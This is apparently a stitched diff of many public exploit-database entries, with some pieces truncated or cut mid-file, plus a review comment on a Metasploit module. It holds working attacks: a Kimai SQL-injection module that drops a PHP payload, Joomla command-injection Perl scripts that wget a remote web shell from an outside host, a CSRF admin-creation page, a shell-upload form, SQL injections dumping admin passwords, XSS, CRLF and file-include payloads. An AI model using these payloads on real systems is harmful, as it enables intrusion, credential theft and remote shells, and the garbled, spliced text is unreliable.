Download: http://www.ametys.org/en/download/ametys-cms.html
Affected version: 3.5.2 and 3.5.1
Summary: Ametys is a Java-based open source CMS combining


@ -1,3 +1,32 @@
# Exploit Title: Up.Time Agent 5.0.1 Stack Overflow
# Date: 28/11/2013
# Exploit Author: Denis Andzakovic
# Vendor Homepage: http://www.uptimesoftware.com/
# Version: 5.0.1
# Tested on: Debian 7 (Kernel 3.2.0), Kali (Kernel 3.7)
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Uptime Agent 5.0.1 Stack Overflow Vulnerability
Affected versions: Uptime Agent 5.0.1 (i386)
PDF:
http://www.security-assessment.com/files/documents/advisory/Up.Time%20Agent%205.0.1%20Stack%20Overflow.pdf
#!/usr/bin/python
#

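--- a/platforms/linux/local/29954.txt
+++ b/platforms/linux/local/29954.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/23844/info
+ELinks is prone to an arbitrary code-execution vulnerability.
+An attacker can exploit this issue to potentially execute arbitrary code with the privileges of the user running the affected application.
+This issue requires an attacker to trick an unsuspecting victim into running the vulnerable application in an attacker-controlled directory.
+This issue affects ELinks 0.11.1; other versions may also be vulnerable.
+$ mkdir -p /tmp/elinks/{run,po}
+$ cp /usr/share/locale/fr/LC_MESSAGES/elinks.mo /tmp/elinks/po/fr.gmo
+$ dd if=/dev/urandom of=/tmp/elinks/po/fr.gmo bs=1024 seek=1 count=200
+$ cd /tmp/elinks/run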


@ -1,21 +0,0 @@
#!/usr/bin/perl
#
# For ARD (Apple Remote Desktop) authentication you must also specify a username.
# You must also install Crypt::GCrypt::MPI and Crypt::Random
# CVE: CVE-2013-5135
# Credit: S2 Crew [Hungary] - PZ
# Software: Apple Remote Desktop
# Vulnerable version: < 3.7
use Net::VNC;
$target = "192.168.1.4";
$password = "B"x64;
$a = "A"x32;
$payload = $a."%28\$n"; # is_exploitable=yes:instruction_disassembly=mov %ecx,(%rax):instruction_address=0x00007fff8e2a0321:access_type=write
print "Apple VNC Server @ $target\n";
print "Check the /var/log/secure.log file ;) \n";
$vnc = Net::VNC->new({hostname => $target, username => $payload, password => $password});
$vnc->login;


@ -1,38 +0,0 @@
#Title: Bypass MOD_PHP Symlink From Sihosin Patch
#Description: Symlink Server By Escaping MOD_PHP and Turning off the Cross-user Security to any another Path.
#Data: 30/10/2013
#Auhor: Mauritania Attacker & Virusa Worm
#Greetz: All AnonGhost Memberz
/var/zpanel/hostdata/ ====> Path of Websites.
/zadmin/public_html/webmail_mydomain_com ====> our Target.
/var/zpanel/temp/ =====> Path where we can read our Bypass.
#For PHP Version 5
<IfModule mod_php5.c>
php_admin_value open_basedir
"/var/zpanel/hostdata/zadmin/public_html/webmail_mydomain_com:/var/zpanel/temp/"
php_admin_value suhosin.executor.func.blacklist "passthru, show_source, shell_exec, system, pcntl_exec, popen, pclose,
proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, leak, apache_child_terminate, posix_kill,
posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, escapeshellcmd, escapeshellarg, exec" Options
FollowSymLinks Indexes AllowOverride All Order Allow,Deny Allow from all
</IfModule>
#For PHP Version 4
<IfModule mod_php4.c>
php_admin_value open_basedir
"/var/zpanel/hostdata/zadmin/public_html/webmail_mydomain_com:/var/zpanel/temp/"
php_admin_value suhosin.executor.func.blacklist "passthru, show_source, shell_exec, system, pcntl_exec, popen, pclose,
proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, leak, apache_child_terminate, posix_kill,
posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, escapeshellcmd, escapeshellarg, exec" Options
FollowSymLinks Indexes AllowOverride All Order Allow,Deny Allow from all
</IfModule>

174
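--- a/platforms/php/remote/30010.rb
+++ b/platforms/php/remote/30010.rb
@@ -0,0 +1,174 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+class Metasploit3 < Msf::Exploit::Remote
+Rank = AverageRanking
+include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::FileDropper
+def initialize(info={})
+super(update_info(info,
+'Name' => "Kimai v0.9.2 'db_restore.php' SQL Injection",
+'Description' => %q{
+This module exploits a SQL injection vulnerability in Kimai version
+0.9.2.x. The 'db_restore.php' file allows unauthenticated users to
+execute arbitrary SQL queries. This module writes a PHP payload to
+disk if the following conditions are met: The PHP configuration must
+have 'display_errors' enabled, Kimai must be configured to use a
+MySQL database running on localhost; and the MySQL user must have
+write permission to the Kimai 'temporary' directory.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'drone (@dronesec)', # Discovery and PoC
+'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+],
+'References' =>
+[
+['EDB' => '25606'],
+['OSVDB' => '93547'],
+],
+'Payload' =>
+{
+'Space' => 8000, # HTTP POST
+'DisableNops'=> true,
+'BadChars' => "\x00\x0a\x0d\x27"
+},
+'Arch' => ARCH_PHP,
+'Platform' => 'php',
+'Targets' =>
+[
+# Tested on Kimai versions 0.9.2.beta, 0.9.2.1294.beta, 0.9.2.1306-3
+[ 'Kimai version 0.9.2.x (PHP Payload)', { 'auto' => true } ]
+],
+'Privileged' => false,
+'DisclosureDate' => 'May 21 2013',
+'DefaultTarget' => 0))
+register_options(
+[
+OptString.new('TARGETURI', [true, 'The base path to Kimai', '/kimai/']),
+OptString.new('FALLBACK_TARGET_PATH', [false, 'The path to the web server document root directory', '/var/www/']),
+OptString.new('FALLBACK_TABLE_PREFIX', [false, 'The MySQL table name prefix string for Kimai tables', 'kimai_'])
+], self.class)
+end
+#
+# Checks if target is Kimai version 0.9.2.x
+#
+def check
+print_status("#{peer} - Checking version...")
+res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, "index.php") })
+if not res
+print_error("#{peer} - Request timed out")
+return Exploit::CheckCode::Unknown
+elsif res.body =~ /Kimai/ and res.body =~ /(0\.9\.[\d\.]+)<\/strong>/
+version = "#{$1}"
+print_good("#{peer} - Found version: #{version}")
+if version >= "0.9.2" and version <= "0.9.2.1306"
+return Exploit::CheckCode::Detected
+else
+return Exploit::CheckCode::Safe
+end
+end
+Exploit::CheckCode::Unknown
+end
+def exploit
+# Get file system path
+print_status("#{peer} - Retrieving file system path...")
+res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, 'includes/vars.php') })
+if not res
+fail_with(Failure::Unknown, "#{peer} - Request timed out")
+elsif res.body =~ /Undefined variable: .+ in (.+)includes\/vars\.php on line \d+/
+path = "#{$1}"
+print_good("#{peer} - Found file system path: #{path}")
+else
+path = normalize_uri(datastore['FALLBACK_TARGET_PATH'], target_uri.path)
+print_warning("#{peer} - Could not retrieve file system path. Assuming '#{path}'")
+end
+# Get MySQL table name prefix from temporary/logfile.txt
+print_status("#{peer} - Retrieving MySQL table name prefix...")
+res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, 'temporary', 'logfile.txt') })
+if not res
+fail_with(Failure::Unknown, "#{peer} - Request timed out")
+elsif prefixes = res.body.scan(/CREATE TABLE `(.+)usr`/)
+table_prefix = "#{prefixes.flatten.last}"
+print_good("#{peer} - Found table name prefix: #{table_prefix}")
+else
+table_prefix = normalize_uri(datastore['FALLBACK_TABLE_PREFIX'], target_uri.path)
+print_warning("#{peer} - Could not retrieve MySQL table name prefix. Assuming '#{table_prefix}'")
+end
+# Create a backup ID
+print_status("#{peer} - Creating a backup to get a valid backup ID...")
+res = send_request_cgi({
+'method' => 'POST',
+'uri' => normalize_uri(target_uri.path, 'db_restore.php'),
+'vars_post' => {
+'submit' => 'create backup'
+}
+})
+if not res
+fail_with(Failure::Unknown, "#{peer} - Request timed out")
+elsif backup_ids = res.body.scan(/name="dates\[\]" value="(\d+)">/)
+id = "#{backup_ids.flatten.last}"
+print_good("#{peer} - Found backup ID: #{id}")
+else
+fail_with(Failure::Unknown, "#{peer} - Could not retrieve backup ID")
+end
+# Write PHP payload to disk using MySQL injection 'into outfile'
+fname = "#{rand_text_alphanumeric(rand(10)+10)}.php"
+sqli = "#{id}_#{table_prefix}var UNION SELECT '<?php #{payload.encoded} ?>' INTO OUTFILE '#{path}/temporary/#{fname}';-- "
+print_status("#{peer} - Writing payload (#{payload.encoded.length} bytes) to '#{path}/temporary/#{fname}'...")
+res = send_request_cgi({
+'method' => 'POST',
+'uri' => normalize_uri(target_uri.path, 'db_restore.php'),
+'vars_post' => Hash[{
+'submit' => 'recover',
+'dates[]' => sqli
+}.to_a.shuffle]
+})
+if not res
+fail_with(Failure::Unknown, "#{peer} - Request timed out")
+elsif res.code == 200
+print_good("#{peer} - Payload sent successfully")
+register_files_for_cleanup(fname)
+else
+print_error("#{peer} - Sending payload failed. Received HTTP code: #{res.code}")
+end
+# Remove the backup
+print_status("#{peer} - Removing the backup...")
+res = send_request_cgi({
+'method' => 'POST',
+'uri' => normalize_uri(target_uri.path, 'db_restore.php'),
+'vars_post' => Hash[{
+'submit' => 'delete',
+'dates[]' => "#{id}"
+}.to_a.shuffle]
+})
+if not res
+print_warning("#{peer} - Request timed out")
+elsif res.code == 302 and res.body !~ /#{id}/
+vprint_good("#{peer} - Deleted backup with ID '#{id}'")
+else
+print_warning("#{peer} - Could not remove backup with ID '#{id}'")
+end
+# Execute payload
+print_status("#{peer} - Retrieving file '#{fname}'...")
+res = send_request_raw({
+'uri' => normalize_uri(target_uri.path, 'temporary', "#{fname}")
+}, 5)
+end
+end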
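Review bot: The `elsif prefixes = res.body.scan(...)` in the table-prefix step and the `elsif backup_ids = res.body.scan(...)` in the backup-ID step can never reach their `else` branches, because `String#scan` always returns an Array, which is truthy even when empty; on no match `table_prefix` and `id` silently become empty strings and both the fallback and the `fail_with(Failure::Unknown, "#{peer} - Could not retrieve backup ID")` path are dead code. Test the result rather than the assignment, e.g. `elsif (prefixes = res.body.scan(...)).any?` and the same for `backup_ids`. The table-prefix fallback also runs a MySQL prefix through `normalize_uri(datastore['FALLBACK_TABLE_PREFIX'], target_uri.path)`, which looks copied from the path fallback and would yield a URI-shaped prefix instead of plain `datastore['FALLBACK_TABLE_PREFIX']`. In `check`, `version >= "0.9.2" and version <= "0.9.2.1306"` compares version strings lexicographically, so a build such as 0.9.2.999 sorts above 0.9.2.1306 and is reported Safe; comparing `Gem::Version.new(version)` values gives the intended numeric ordering.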


@ -1,21 +0,0 @@
#
# GeecomPromo 1.5 Multiple SQL Injection Vulnerability
# Author: ExploitsLab
# Vendor Homepage: http://www.geecom.org/
# Download: http://www.geecom.org/scaricaFile.php?id=4
# Version: 1.5
#
#### SQL injection notizie.php ####
[target]/notizie.php?id=-1+UNION+SELECT+0,0,admin_password,0,0+FROM+admin
#### SQL injection pagine.php ####
[target]/pagine.php?alias='+UNION+SELECT+0,0,0,0,0,admin_password,0,0,0,0,0,0,0+FROM+admin%23
#### SQL injection scaricaFile.php ####
[target]/scaricaFile.php?id=1+UNION+SELECT+0,0,admin_password,0,0+FROM+admin
CONTACT: andreascarpa9@gmail.com


@ -1,103 +0,0 @@
###########################################################
[~] Exploit Title:appRain-v-3.0.2::stored XSS on multiple Parameters & CSRF
vulnerability's
[~] Author: sajith
[~] version: appRain-v-3.0.2
[~] vulnerable app link:http://www.apprain.com/download
###########################################################
1)Attacker can create new admin users by exploiting "Add New admin"
functionality via CSRF vulnerability in the Admin panel
POC:
<html lang="en">
<head>
<title>POC by Sajith Shetty</title>
</head>
<body>
<form action="http://127.0.0.1/cms/appRain-v-3.0.2/admin/manage/add/"
id="formid" method="post">
<input type="hidden" name="data[Admin][f_name]" value="first_name" />
<input type="hidden" name="data[Admin][l_name]" value="last_name"/>
<input type="hidden" name="data[Admin][email]" value="test@test.com" />
<input type="hidden" name="data[Admin][username]" value="testing" />
<input type="hidden" name="data[Admin][password]" value="T#utw8on007" />
<input type="hidden" name="data[Admin][status]" value="Active" />
<input type="hidden" name="data[Admin][description]" value="testing" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
2)stored XSS in multiple parameter's:
steps:
1) log into the admin panel and access the link
http://127.0.0.1/cms/appRain-v-3.0.2/admin/manage/add
2)Input the payload in the "first name" and "last name" field
payload:"><img src=x onerror=prompt(1);>
3)click on manage Admins functionality to execute the payload.
request:
POST /cms/appRain-v-3.0.2/admin/manage/add/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/cms/appRain-v-3.0.2/admin/manage/add
Content-Length: 344
Cookie: PHPSESSID=84ceiepe7pus96194mbt9m6vf3
Pragma: no-cache
Cache-Control: no-cache
data%5BAdmin%5D%5Bf_name%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt(1)%3B%3E&data%5BAdmin%5D%5Bl_name%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt(2)%3B%3E&data%5BAdmin%5D%5Bemail%5D=testing%
40xyz.com
&data%5BAdmin%5D%5Busername%5D=test1&data%5BAdmin%5D%5Bpassword%5D=T%24asw123&data%5BAdmin%5D%5Bstatus%5D=Active&data%5BAdmin%5D%5Bdescription%5D=test
response:
<label for="input">First Name:</label>
</div>
<div class="input">
<input type="text" name="data[Admin][f_name]"
value=""><img src=x onerror=prompt(1);>" id="f_name" class="large
check_notempty" longdesc="Please enter first name" />
</div>
</div>
<div class="field">
<div class="label">
<label for="l_name">Last Name:</label>
</div>
<div class="input">
<input type="text" name="data[Admin][l_name]"
value=""><img src=x onerror=prompt(2);>" id="l_name" class="large
check_notempty" longdesc="Please enter last name" />
</div>
</div>
{#}Access the URL
http://127.0.0.1/cms/appRain-v-3.0.2/category/manage/blog-cat/update/6where
"blog category" "description" and "sort order" input fields are
vulnerable to stored xss


@ -1,93 +0,0 @@
# Exploit Title : Open TestBed framework arbitrary file upload exploit
# Date : 26 November 2013
# Exploit Author : 3rr0r1046 IndiShell
# Vulnerable script link : https://github.com/mszczodrak/otf
# Tested on : Linux
#Category : Remote exploit
////////////////////
DESCRIPTION
////////////////////
The Open Testbed Framework (OTF) consists of a set of tools for rapid deployment of a Low-Power Wireless Network (LPWN) testbeds.
There is flaw in Open TestBed framework script which allows an attacker to upload php shell .
//////////////////
Prof of concept
//////////////////
https://github.com/mszczodrak/otf/blob/master/web/upload_file.php
this is the file which contains vulnerable code . During file upload script does not check for file extension and upload it to server
here is the vulnerable code
<?php
/*
Author: Marcin Szczodrak
Columbia University
Last Modified: 10/22/2012
*/
include("header.php");
file_exists("configuration.php") or die("Missing 'configuration.php' file. Please use 'configuration.php.example' as a template to create 'configuration.php'");
include("configuration.php");
$content = "<pre>";
$content = $content . "\t\tUploading Log<br />";
// Limit file size to 200KB
//$content = $content . "Z1: " . $_FILES["Z1_firmware"]["size"] . " TelosB: " . $_FILES["TelosB_firmware"]["size"];
if (($_FILES["Z1_firmware"]["size"] < $max_firmware_size) and ($_FILES["TelosB_firmware"]["size"] < $max_firmware_size))
{
if ($_FILES["Z1_firmware"]["error"] > 0)
{
$content = $content . "<b>Z1 firmware file is missing.</b>" . "<br />";
$content = $content . "<b>Error: " . $_FILES["Z1_firmware"]["error"] . "</b><br />";
}
else
{
$content = $content . "<b>Z1</b><br />";
$content = $content . "Upload: " . $_FILES["Z1_firmware"]["name"] . "<br />";
$content = $content . "Type: " . $_FILES["Z1_firmware"]["type"] . "<br />";
$content = $content . "Size: " . ($_FILES["Z1_firmware"]["size"] / 1024) . " Kb<br />";
$content = $content . "Stored in: " . $_FILES["Z1_firmware"]["tmp_name"] . "<br />";
move_uploaded_file($_FILES["Z1_firmware"]["tmp_name"],
$Z1_upload . $_FILES["Z1_firmware"]["name"] );
$content = $content . "Stored in: " . $Z1_upload . $_FILES["Z1_firmware"]["name"] . "<br />";
$fz = fopen($Z1_nodes, 'w');
fwrite($fz, $_POST['Z1_nodes']);
fclose($fz);
}
this code will let you upload any file having size below 200 kb and store it to 127.0.0.1/web/uploads/
if your shell name is shell.php , it will be stored in uploads folder with name Z1_shell.php
here is exploit code
==========================================================================================================================
<html>
<body >
<div align=center>
<font size=4 color=red face="comic sans ms"><img src="http://www.freesmileys.org/smileys/smiley-cool21.gif"> --==[[ code for India,Hack for India,Die for India ]]==-- <img src="http://www.freesmileys.org/smileys/smiley-flag010.gif"></font><br><br>
<form method=post action="http://127.0.0.1/otf-master/web/upload_file.php" enctype=multipart/form-data>
<br>Browse shell : <input type=file name="Z1_firmware">
  <input type=submit value="spin the shit">
</form>
</body></html>
============================================================================================================================
shell will be in directory
http://127.0.0.1/otf-master/web/uploads/
-==[[Greetz to]]==--
###########################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,
#Local root indishell,Irfninja indishell,Reborn India,L0rd Crus4d3r,cool toad,cool shavik,Hackuin,Alicks,Ebin V Thomas,Dinelson Amine,Th3 D3str0yer,SKSking,Mr. Trojan,
#rad paul,Godzila,mike waals,zoo,cyber warrior,Neo hacker ICA,Suriya Prakash,cyber gladiator,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR
#saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen ,lovetherisk,brown suger and rest of TEAM INDISHELL
--==[[Love to]]==--
# My Father , my Ex Teacher,GCE college ke DON,cold fire hacker,Mannu, ViKi,Ashu bhai ji,Soldier Of God, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand ,Budhaoo


@ -1,59 +0,0 @@
#######################################################################
Ciaran McNally
Application: IP.Board
http://www.invisionpower.com/apps/board/
Versions: <= 3.4.6
Platforms: Windows, Mac, Linux
Bug: Simple Persistant XSS
Exploitation: WEB
Date: 27 November 2013.
Author: Ciaran McNally
Web: http://makthepla.net/blog/=/minor-xss-ip-board
My Twitter: https://twitter.com/ciaranmak
#######################################################################
1) Bug.
2) The exploit.
3) Fix.
#######################################################################
Forum software for thriving discussions.
#######################################################################
======
1) Bug
======
Javascript injection via a Website URL that is incorrectly sanitized.
Rating:Low severity.
#######################################################################
==============
2) The exploit
==============
Simply include "javascript:prompt(document.domain);//http://" in your
profile "Web Page" section. This is then saved as a link on your profile.
Javascript execution occurs when the link is clicked.
An attacker could store the victims cookie or possibly perform further
CSRF attacks on whoever is dumb enough to click the link.
#######################################################################
======
3) Fix
======
None as of yet...
#######################################################################
--
maK :)


@ -1,28 +0,0 @@
#############################
# Exploit Title : Kleeja CRLF injection
# Author : Ashiyane Digital Security Team
# Software link: http://Kleeja.com
# Google Dork : intext:Kleeja ? 2007-2013. All rights reserved
# Date: 2013/11/26
# Version : 1.0.1 - 1.5.4
# Tested on: Windows 7 , Linux
##############
# This script is possibly vulnerable to CRLF injection attacks.
# The problem is located in the file:
# /install/index.php
#
# Suppose you run a vulnerable website that has a member section.
# An attacker will send an email to one of your members containing a
CRLF-crafted link.
# This link appears to be legitimate; after all it points to your own website.
# The link might look something like the one below:
# http://localhost/page.php?page=%0d%0aContent-Type:
text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type:
text/html%0d%0a%0d%0a%3Chtml%3EAshiyane Content%3C/html%3E
#
##############
# Special Tnx to : Reza-S4T4N,C4T,Angel-D3m0n,V1R4N64R,
# Rz04,Ali_Eagle,HAMIDx9,Alireza666,ACC3SS ...
# --------------
# bY T3rm!nat0r5
###########################


@ -2,14 +2,12 @@
# Exploit Title: MyBB <= 1.6.11 Remote Code Execution Using Admin Privileges
# Date: 30/11/2013
# Exploit Author: BlackDream @ p0wnbox.com
# Google Dork: [if relevant] (we will automatically add these to the GHDB)
# Exploit Author: BlackDream
# Vendor Homepage: www.mybb.com
# Software Link: http://www.mybb.com/download/latest
# Version: <= 1.6.11
# Tested on: Linux
# Thanks to: UnderSec
# Thanks to: www.p0wnbox.com
/*
Ok guys here we are. In older versions of MyBB it was possible to execute PHP Code by injecting the php code into a template file.


@ -1,136 +0,0 @@
#Title : Joomla com_alpahuserpoints Remote Code Execution
#Author : DevilScreaM
#Date : 1 Desember 2013
#Category : Web Applications
#Type : PHP
#Vendor : http://alphaplug.com/
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : Remote Code Execution
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
$target = $ARGV[0];
if($target eq '')
{
print "======================================================\n";
print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n";
print "======================================================\n";
sleep(0.8);
print "Usage: perl exploit.pl <target> \n";
exit(1);
}
if ($target !~ /http:\/\//)
{
$target = "http://$target";
}
#print "[*] Enter the address of your hosted TXT shell (ex: '
http://c99.gen.tr/r57.txt') => ";
#$shell = <STDIN>;
sleep(1);
print "======================================================\n";
print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n";
print "======================================================\n";
sleep(1.1);
print "[*] Testing exploit ... \n";
sleep(1.1);
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101
Firefox/14.0.1');
$shell = "wget http://www.r57c99shell.net/shell/r57.txt -O shell.txt";
$website =
"$target/components/com_alphauserpoints/assets/phpThumb/phpThumb.php??src=file.jpg&fltr
[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; $shell ;
&phpThumbDebug=9";
$request = $agent->request(HTTP::Request->new(GET=>$website));
if ($request->is_success)
{
print "[+] Exploit sent with success. \n";
sleep(1.4);
}
else
{
print "[-] Exploit sent but probably the website is not vulnerable. \n";
sleep(1.3);
}
print "[*] Checking if the txt shell has been uploaded...\n";
sleep(1.2);
$cwebsite =
"$target/components/com_alphauserpoints/assets/phpThumb/shell.txt";
$creq = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($creq->is_success)
{
print "[+] Txt Shell uploaded :) \n";
sleep(1);
print "[*] Moving it to PHP format... Please wait... \n";
sleep(1.1);
$mvwebsite =
"$target/components/com_alphauserpoints/assets/phpThumb/phpThumb.php?
src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg ; mv shell.txt shell.php ;
&phpThumbDebug=9";
$mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite));
$cwebsite =
"$target/components/com_alphauserpoints/assets/phpThumb/shell.php";
$c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($c2req->is_success)
{
print "[+] PHP Shell uploaded => $cwebsite :) \n";
sleep(0.8);
print "[*] Do you want to open it? (y/n) => ";
$open = <STDIN>;
if ($open == "y")
{
$firefox = "firefox $cwebsite";
system($firefox);
}
}
else
{
print "[-] Error while moving shell from txt to PHP :( \n";
exit(1);
}
}
else
{
print "[-] Txt shell not uploaded. :( \n";
}
==============================================================
Shell Access
http://TARGET/components/com_alphauserpoints/assets/phpthumb/shell.php


@ -1,136 +0,0 @@
#Title : Joomla com_alphacontent Remote Code Execution
#Author : DevilScreaM
#Date : 1 Desember 2013
#Category : Web Applications
#Type : PHP
#Vendor : http://alphaplug.com/
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : Remote Code Execution
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
$target = $ARGV[0];
if($target eq '')
{
print "======================================================\n";
print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n";
print "======================================================\n";
sleep(0.8);
print "Usage: perl exploit.pl <target> \n";
exit(1);
}
if ($target !~ /http:\/\//)
{
$target = "http://$target";
}
#print "[*] Enter the address of your hosted TXT shell (ex: '
http://c99.gen.tr/r57.txt') => ";
#$shell = <STDIN>;
sleep(1);
print "======================================================\n";
print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n";
print "======================================================\n";
sleep(1.1);
print "[*] Testing exploit ... \n";
sleep(1.1);
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101
Firefox/14.0.1');
$shell = "wget http://www.r57c99shell.net/shell/r57.txt -O shell.txt";
$website =
"$target/components/com_alphacontent/assets/phpThumb/phpThumb.php??src=file.jpg&fltr
[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; $shell ;
&phpThumbDebug=9";
$request = $agent->request(HTTP::Request->new(GET=>$website));
if ($request->is_success)
{
print "[+] Exploit sent with success. \n";
sleep(1.4);
}
else
{
print "[-] Exploit sent but probably the website is not vulnerable. \n";
sleep(1.3);
}
print "[*] Checking if the txt shell has been uploaded...\n";
sleep(1.2);
$cwebsite =
"$target/components/com_alphacontent/assets/phpThumb/shell.txt";
$creq = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($creq->is_success)
{
print "[+] Txt Shell uploaded :) \n";
sleep(1);
print "[*] Moving it to PHP format... Please wait... \n";
sleep(1.1);
$mvwebsite =
"$target/components/com_alphacontent/assets/phpThumb/phpThumb.php?
src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg ; mv shell.txt shell.php ;
&phpThumbDebug=9";
$mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite));
$cwebsite =
"$target/components/com_alphacontent/assets/phpThumb/shell.php";
$c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($c2req->is_success)
{
print "[+] PHP Shell uploaded => $cwebsite :) \n";
sleep(0.8);
print "[*] Do you want to open it? (y/n) => ";
$open = <STDIN>;
if ($open == "y")
{
$firefox = "firefox $cwebsite";
system($firefox);
}
}
else
{
print "[-] Error while moving shell from txt to PHP :( \n";
exit(1);
}
}
else
{
print "[-] Txt shell not uploaded. :( \n";
}
==============================================================
Shell Access
http://TARGET/components/com_alphacontent/assets/phpthumb/shell.php


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23843/info
PHP Content Architect is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
PHP Content Architect 0.9 pre 1.2 is vulnerable; other versions may also be affected.
http://www.example.com/[path]noah/modules/noevents/templates/mfa_theme.php?tpls[1]=[shell]

12
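--- a/platforms/php/webapps/29955.txt
+++ b/platforms/php/webapps/29955.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/23845/info
+The WF-Quote module for the Xoops CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
+WF-Quote 1.0 is vulnerable; other versions may also be affected.
+http://www.example.com/modules/wfquotes/index.php?op=cat&c=1/**/UNION/**/SELECT/**/0,uname,pass,3,4,5/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*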


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23847/info
Mini Web Shop is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
This issue affects Mini Web Shop 2; other versions may also be affected.
http://remote-server/path/modules/order_form.php/[xss]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23847/info
Mini Web Shop is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
This issue affects Mini Web Shop 2; other versions may also be affected.
http://remote-server/path/modules/sendmail.php/[xss]

14
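--- a/platforms/php/webapps/29960.txt
+++ b/platforms/php/webapps/29960.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/23856/info
+TurnkeyWebTools SunShop Shopping Cart is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+Exploiting these issues may allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, bypass the authentication mechanism, access or modify data, or exploit latent vulnerabilities in the underlying database implementation. Other attacks are also possible.
+SunShop Shopping Cart v4 is reported vulnerable; other versions may also be affected.
+<form action="http://demos.turnkeywebtools.com/ss4/index.php" method="post">
+<input name="c" size=75 value="'">
+<input name="pg" type="hidden" value="1">
+<input name="l" type="hidden" value="product_list">
+<input type=submit value="Execute SQL Injection on variable 'c' in index.php" class="button">
+</form>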

23
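--- a/platforms/php/webapps/29961.txt
+++ b/platforms/php/webapps/29961.txt
@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/23856/info
+TurnkeyWebTools SunShop Shopping Cart is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+Exploiting these issues may allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, bypass the authentication mechanism, access or modify data, or exploit latent vulnerabilities in the underlying database implementation. Other attacks are also possible.
+SunShop Shopping Cart v4 is reported vulnerable; other versions may also be affected.
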